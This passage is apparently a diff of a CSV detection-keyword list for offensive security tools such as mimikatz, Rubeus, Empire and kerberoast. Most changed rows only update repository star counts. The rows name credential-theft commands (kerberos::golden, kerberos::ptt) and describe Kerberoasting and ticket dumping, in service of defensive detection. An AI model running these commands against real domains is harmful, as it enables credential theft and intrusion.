+"*KeeThief.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*KeeThiefSyscalls*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10","","N/A","","","" "*keethief-syscalls*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"*kerberoast /*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*kerberoast /*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Kerberoast.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*kerberoast /*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*kerberoast /*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Kerberoast.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*kerberoast.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*Kerberoast.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*kerberoast_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*kerberoast_blind_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
-"*kerberoast_john_results_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerberoast_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerberoast_blind_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerberoast_john_results_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*kerberoastables.txt*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation 
Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" "*kerberoasting*","offensive_tool_keyword","OSCP-Cheatsheets","kerberoasting keyword. attack that allows any domain user to request kerberos tickets from TGS that are encrypted with NTLM hash of the plaintext password of a domain user account that is used as a service account (i.e account used for running an IIS service) and crack them offline avoiding AD account lockouts.","T1558 - T1208 - T1003 - T1110","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md","1","1","N/A","N/A","1","81","33","2019-09-09T22:07:47Z","2019-09-12T22:07:31Z" "*kerberoasting.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*kerberos*.kirbi*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*kerberos/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential 
Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*kerberos::ask*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::clist*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::golden*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::golden*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::hash*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::list*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts 
passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. This function lists all Kerberos tickets in memory","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::ptc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::ask*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::clist*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::golden*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::golden*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts 
passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::hash*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::list*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. This function lists all Kerberos tickets in memory","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::ptc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*kerberos::ptt *.kirbi*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","0","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" -"*kerberos::ptt*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::ptt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::ptt*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::ptt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*kerberos::ptt*.kirbi*","offensive_tool_keyword","mimikatz","Mimikatz Unconstrained delegation. 
With administrative privileges on a server with Unconstrained Delegation set we can dump the TGTs for other users that have a connection. If we do this successfully. we can impersonate the victim user towards any service in the domain.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","10","10","N/A","N/A","N/A","N/A" -"*kerberos::purge*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::tgt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
